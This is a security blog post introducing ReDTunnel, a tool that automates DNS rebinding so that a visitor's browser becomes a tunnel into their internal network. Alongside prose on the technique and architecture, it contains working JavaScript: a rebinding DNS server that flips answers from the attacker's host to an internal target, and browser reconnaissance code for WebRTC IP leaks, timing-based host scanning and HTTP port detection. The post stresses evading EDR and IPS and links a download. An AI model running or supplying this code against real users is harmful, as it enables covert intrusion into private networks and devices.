Scorpiones Group

ReDTunnel - Redefining DNS Rebinding Attack

By Nimrod Levy and Tomer Zait

Introduction

Have you ever thought about how to access a victim's internal network without running malware on their computer or using a 0-day?

Did you ever imagine browsing to a website containing a sophisticated script that gives you a full tunnel into the victim's internal network?
That is exactly why we decided to write the ReDTunnel tool.
The goal is to use the tools that already exist in the victim's operating system (the browser)
in order to gain access to the HTTP services on its network, with an emphasis on evading EDR systems and without raising alerts in network detection systems (IPS).
We decided to combine reconnaissance techniques in JavaScript with DNS rebinding attacks to achieve this:
all you have to do is get the victim to browse to a website that contains the script that connects to the ReDTunnel core, and the game begins!
After about two minutes,
you can browse the web assets that belong to the victim (for example, a router or a NAS). Needless to say, this is a great way to start a successful Red Team operation.

DNS Rebinding
DNS rebinding is a class of attack in which the attacker serves repeated DNS answers for a domain under their control:
the first answer points at the attacker's own server, so the page loads from that origin and passes the browser's origin checks, while subsequent answers (served with a very short TTL) point at an address on the victim's internal network, so the page's scripts can now read responses from that internal host as if it were the same origin.
The DNS rebinding attack technique normally requires detailed knowledge of the target network,
but a new tool by security researchers Tomer Zait (Principal Security Researcher at F5 Networks) and Nimrod Levy (CTO and co-founder at Scorpiones), dubbed ReDTunnel, means an attacker needs "zero knowledge about the target" in order to run the attack.
It uses JavaScript in a malicious web page to gain control over the HTTP resources on the user's internal network.
Because the browser believes the rebound host is the attacker's own origin, the attack sidesteps the same-origin policy and therefore the cross-origin resource sharing (CORS) restrictions that would normally block such cross-origin reads.

The result is that you open your browser, wait until the victim visits your website, and then start browsing the internal websites in their network.
It’s a great tool especially if you’re part of a red team.
We recommend you read more about DNS Rebinding in this link.
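To make the two-phase answer concrete, here is a minimal rebinding DNS responder written as an added example; it is not ReDTunnel's own DNS service, and the attacker address, target address and zone name are assumed placeholders. It parses an A query, answers the first query for a given name with the attacker's server and every later query for that name with the internal target, and sets TTL 0 so the browser re-resolves.

```javascript
// Minimal DNS rebinding responder: an added example, not ReDTunnel's own DNS
// service. It answers A queries for one attacker-controlled zone. The first
// answer for a given name is the attacker's web server (so the page loads from
// that origin); every later answer for the same name is the internal target,
// with TTL 0 so the browser re-resolves instead of reusing the cached address.
// Addresses and the zone name are assumed placeholders.
const ATTACKER_IP = "203.0.113.10";   // assumed: attacker's public web server
const TARGET_IP = "192.168.1.1";      // assumed: victim's router, hit after rebinding
const REBIND_ZONE = "rebind.example"; // assumed attacker-controlled zone

// Read an uncompressed DNS name at `offset`; client queries never use pointers.
function readName(buf, offset) {
  const labels = [];
  let pos = offset;
  while (buf[pos] !== 0) {
    const len = buf[pos];
    labels.push(buf.toString("ascii", pos + 1, pos + 1 + len));
    pos += 1 + len;
  }
  return { name: labels.join("."), end: pos + 1 };
}

function parseQuery(buf) {
  const id = buf.readUInt16BE(0);
  const { name, end } = readName(buf, 12);
  return { id, name, qtype: buf.readUInt16BE(end), questionEnd: end + 4 };
}

// Build a standard A/IN query (used here to construct offline sample input).
function buildQuery(id, name) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x0100, 2); // RD=1
  header.writeUInt16BE(1, 4);      // QDCOUNT=1
  const labels = name.split(".").map((l) => Buffer.concat([Buffer.from([l.length]), Buffer.from(l, "ascii")]));
  return Buffer.concat([header, ...labels, Buffer.from([0, 0, 1, 0, 1])]); // root, QTYPE=A, QCLASS=IN
}

class RebindingResolver {
  constructor(attackerIp, targetIp) {
    this.attackerIp = attackerIp;
    this.targetIp = targetIp;
    this.seen = new Set(); // names that already received the attacker's address
  }

  // State is keyed by the queried name: the attack page uses a unique random
  // subdomain per victim, so the flip happens per victim even when queries
  // arrive through a shared recursive resolver.
  addressFor(name) {
    if (this.seen.has(name)) return this.targetIp;
    this.seen.add(name);
    return this.attackerIp;
  }

  respond(queryBuf) {
    const q = parseQuery(queryBuf);
    const name = q.name.toLowerCase();
    const inZone = name === REBIND_ZONE || name.endsWith("." + REBIND_ZONE);
    const ip = inZone && q.qtype === 1 ? this.addressFor(name) : null;
    const header = Buffer.alloc(12);
    header.writeUInt16BE(q.id, 0);
    header.writeUInt16BE(ip ? 0x8180 : 0x8183, 2); // QR/RD/RA; RCODE 3 (NXDOMAIN) if not ours
    header.writeUInt16BE(1, 4);                   // QDCOUNT
    header.writeUInt16BE(ip ? 1 : 0, 6);          // ANCOUNT
    const question = queryBuf.subarray(12, q.questionEnd);
    if (!ip) return Buffer.concat([header, question]);
    const answer = Buffer.alloc(16);
    answer.writeUInt16BE(0xc00c, 0); // compression pointer to the question name
    answer.writeUInt16BE(1, 2);      // TYPE A
    answer.writeUInt16BE(1, 4);      // CLASS IN
    answer.writeUInt32BE(0, 6);      // TTL 0: do not cache the answer
    answer.writeUInt16BE(4, 10);     // RDLENGTH
    ip.split(".").forEach((octet, i) => { answer[12 + i] = Number(octet); });
    return Buffer.concat([header, question, answer]);
  }
}

// Extract the A record from a response produced above (null for NXDOMAIN).
function answeredIp(respBuf) {
  if (respBuf.readUInt16BE(6) === 0) return null;
  const { end } = readName(respBuf, 12);
  const rdata = end + 4 + 12; // skip QTYPE/QCLASS, then name ptr, TYPE, CLASS, TTL, RDLENGTH
  return Array.from(respBuf.subarray(rdata, rdata + 4)).join(".");
}

// Serve on UDP; call explicitly, e.g. serve(5353) in a lab.
function serve(port) {
  const dgram = require("dgram");
  const resolver = new RebindingResolver(ATTACKER_IP, TARGET_IP);
  const sock = dgram.createSocket("udp4");
  sock.on("message", (msg, rinfo) => sock.send(resolver.respond(msg), rinfo.port, rinfo.address));
  sock.bind(port);
  return sock;
}

// Offline walk-through with a constructed query for one victim's subdomain.
function demo() {
  const resolver = new RebindingResolver(ATTACKER_IP, TARGET_IP);
  const query = buildQuery(0x1234, "a1b2c3.rebind.example");
  return [answeredIp(resolver.respond(query)), answeredIp(resolver.respond(query))];
}
console.log(demo()); // first resolution -> attacker, second -> internal target
```

Two practical caveats: recursive resolvers may clamp a TTL of 0 to a minimum, and browsers keep their own host cache, which is why the rebinding only takes effect after a delay rather than on the very next request. On the defensive side, a resolver that refuses RFC 1918 answers from external zones (for example dnsmasq's `--stop-dns-rebind`) and internal services that validate the `Host` header both break this flow, since the rebound request still carries the attacker's hostname.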

The limitations in DNS Rebinding
The DNS rebinding attack requires a lot of information about the victim in order to gain access:
for example, which browser the victim uses, the IP subnet of the victim's network, and so on.
Before ReDTunnel,
all this information had to be collected in advance, and the attacker had to write the scripts that use the collected information to attack the victim.
To remove these limitations, we used JavaScript reconnaissance techniques.

JavaScript Reconnaissance
Reconnaissance is the process of collecting information about the victim,
for example: which browser does the victim use? Which extensions are installed in it? Can we get the internal IP address? Which IP addresses on the network are alive? Which assets are available to the victim on the network?
You will be surprised how much JavaScript can help with this work and how much information can be collected by a single script.
So how does the reconnaissance process work using JavaScript? There are many methods for collecting information;
let's look at one example:
When we connect to an existing IP address on a port that is not open, we get a connection-failure error in less than 2 seconds (in Chrome, net::ERR_CONNECTION_REFUSED),
whereas a connection to an IP address that does not exist fails with a different error only after more than 2 seconds (net::ERR_CONNECTION_TIMED_OUT).
We can't read the error type from JavaScript (the browser exposes only an opaque failure), but we can measure the time and know that some error occurred.

Let's try to understand the mechanism
Victim Architecture

In the picture above you can see the victim's browser making connection attempts to different IP addresses:
the red arrows indicate connections to IP addresses that are unreachable on the network, while the black arrows indicate IP addresses that are reachable.
When an internal IP address on the local network is contacted, the victim's machine first has to find the host on the link (an ARP request).
If a host claims the address,
its TCP stack immediately replies that the port is closed (a RST), so we get a quick "connection refused" error. So far it's clear.
If we try to reach an IP address with no host behind it, nothing answers, the browser waits for the timeout, and from that delay we can tell that the IP address is unreachable.
It's important to note that each browser has its own limitations; for example, the method we described works in Google Chrome but not in Firefox.
In Firefox we can send many more requests at the same time, so we do not have to use this method just to make sure we only send requests to reachable IP addresses.

ReDTunnel

So, as we said, in order for ReDTunnel to succeed we need to collect information about the victim,
so we chained the following JavaScript reconnaissance techniques, in this order:
  1. Disclosure of the internal IP address:
    To discover the internal IP address we used WebRTC.
    Example script: WebRTC code
  2. Detection of IP addresses on the network:
    To discover the reachable IP addresses on the network we used the timing attack described above, via Ajax requests.
    The example script you can find here.
  3. Discovery of open ports that serve HTTP:
    To discover open ports with HTTP services behind them, we create a DOM element whose source points at the port we are checking.
    From the timing and the events we can tell whether there really is an HTTP service behind the port: the event we need is "onload"; if "onload" fires, there is an HTTP service behind that port.
    A sample script can be found here.

The following illustration presents the ReDTunnel architecture and explains the processes behind the scenes:
ReDTunnel Architecture
  1. The victim browses to a site that contains the ReDTunnel (Core).
    The ReDTunnel Core service contains both the attack side and the management side.
  2. ReDTunnel collects the victim's information: it finds the victim's internal address, uses that address to scan the IP addresses on the victim's network, and then finds HTTP services on those addresses.
    All findings are, of course, reported to the ReDTunnel (Core) management server.
  3. While the victim's data is being collected, the DNS rebinding attack is executed automatically (via communication between the Core service and the DNS service).
  4. The attacker uses the Admin interface to browse applications on the victim's network, or on the victim's computer (localhost), from his own browser, and can even run automated tools such as sqlmap (by passing it the ReDTunnel cookie content).
ReDTunnel example
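The following is an added example of the three reconnaissance steps above and of the timing method from the JavaScript Reconnaissance section; it is not ReDTunnel's own script, and the sample ICE candidate and the timing table it runs on are constructed. The WebRTC, fetch and `<img>` probes only work inside a browser; the parsing and classification logic is pure and is what the offline walk-through exercises.

```javascript
// Browser-side reconnaissance helpers: an added example, not ReDTunnel's own
// scripts. Steps: (1) the victim's internal IPv4 from a WebRTC ICE host
// candidate, (2) live hosts on that /24 by how quickly a connection attempt
// fails (Chrome timing: fast failure = a host answered with a closed port,
// timeout = no host), (3) an HTTP check on a port via an <img> onload event.
// The network probes only run in a browser; the classification is pure and is
// driven here by constructed timings.

const PRIVATE_V4 = /^(10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+|172\.(1[6-9]|2\d|3[01])\.\d+\.\d+)$/;

// "candidate:<foundation> <component> <proto> <priority> <address> <port> typ host ..."
// Returns the address only for host candidates carrying a private IPv4;
// mDNS-obfuscated candidates (*.local), which current browsers emit by
// default, and server-reflexive (public) candidates yield null.
function privateIpFromCandidate(candidate) {
  const f = candidate.trim().split(/\s+/);
  if (f.length < 8 || f[6] !== "typ" || f[7] !== "host") return null;
  return PRIVATE_V4.test(f[4]) ? f[4] : null;
}

// Browser only: open a data channel so ICE gathering starts and resolve with
// the first private host candidate (null once gathering ends without one).
function discoverInternalIp() {
  return new Promise((resolve) => {
    const pc = new RTCPeerConnection({ iceServers: [] });
    pc.createDataChannel("recon");
    pc.onicecandidate = (ev) => {
      if (!ev.candidate) { pc.close(); resolve(null); return; }
      const ip = privateIpFromCandidate(ev.candidate.candidate);
      if (ip) { pc.close(); resolve(ip); }
    };
    pc.createOffer().then((offer) => pc.setLocalDescription(offer));
  });
}

// All 254 host addresses of the /24 containing `ip`.
function subnetHosts(ip) {
  const prefix = ip.split(".").slice(0, 3).join(".");
  return Array.from({ length: 254 }, (_, i) => `${prefix}.${i + 1}`);
}

// Browser only: elapsed ms until a no-cors fetch to host:port settles. The
// failure reason is opaque to script, so only the timing carries information.
async function timedProbe(host, port, timeoutMs) {
  const ctrl = new AbortController();
  const timer = setTimeout(() => ctrl.abort(), timeoutMs);
  const start = performance.now();
  try {
    await fetch(`http://${host}:${port}/`, { mode: "no-cors", cache: "no-store", signal: ctrl.signal });
  } catch (_) { /* refused, timed out or aborted: all land here */ }
  clearTimeout(timer);
  return performance.now() - start;
}

// Pure classification: a failure faster than the threshold means something
// answered (host up, port closed); slower means the address is unreachable.
function pickReachable(hosts, elapsedMs, thresholdMs) {
  return hosts.filter((h, i) => elapsedMs[i] < thresholdMs);
}

// Probe in small batches so the browser's connection limits do not queue
// requests, inflate the timings and turn live hosts into false timeouts.
async function scanHosts(hosts, probe, thresholdMs, concurrency = 6) {
  const reachable = [];
  for (let i = 0; i < hosts.length; i += concurrency) {
    const batch = hosts.slice(i, i + concurrency);
    const times = await Promise.all(batch.map((h) => probe(h)));
    reachable.push(...pickReachable(batch, times, thresholdMs));
  }
  return reachable;
}

// Browser only: onload from an <img> proves an HTTP server answered with an
// image; onerror is ambiguous (no service, or a non-image response), so only
// onload counts as positive, as the post describes.
function hasHttpService(host, port, timeoutMs) {
  return new Promise((resolve) => {
    const img = new Image();
    const timer = setTimeout(() => { img.src = ""; resolve(false); }, timeoutMs);
    img.onload = () => { clearTimeout(timer); resolve(true); };
    img.onerror = () => { clearTimeout(timer); resolve(false); };
    img.src = `http://${host}:${port}/favicon.ico?${Date.now()}`;
  });
}

// Constructed timings standing in for a real LAN: two hosts answer quickly,
// everything else hits the 2 s timeout.
const SAMPLE_TIMINGS = { "192.168.1.1": 35, "192.168.1.37": 12 };
const simulatedProbe = async (host) => SAMPLE_TIMINGS[host] ?? 2000;

// Offline walk-through: constructed candidate line -> /24 -> reachable hosts.
async function demo() {
  const ip = privateIpFromCandidate("candidate:1 1 udp 2122260223 192.168.1.37 54321 typ host generation 0");
  return scanHosts(subnetHosts(ip), simulatedProbe, 1000);
}
demo().then((hosts) => console.log("reachable:", hosts));
```

In a browser the pipeline is `discoverInternalIp()`, then `scanHosts(subnetHosts(ip), (h) => timedProbe(h, 54321, 2500), 1000)` against a port that is almost certainly closed, then `hasHttpService(host, port, 3000)` for each live host and candidate port. The threshold is the point the post makes: the two classes of failure are separated by seconds, so a cut-off of about one second is robust even on a busy LAN.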

In conclusion

The ReDTunnel tool redefines the DNS rebinding attack by automating it:
gathering the information before the attack and managing the victims in a safe and sophisticated manner lets the attacker browse the victims' internal networks directly and run automated tools against them,
with support for the PATCH / PUT / DELETE methods and Basic Authentication login for the attacker.

To download the ReDTunnel tool, click here!

Tags: DNS Rebinding Red Team
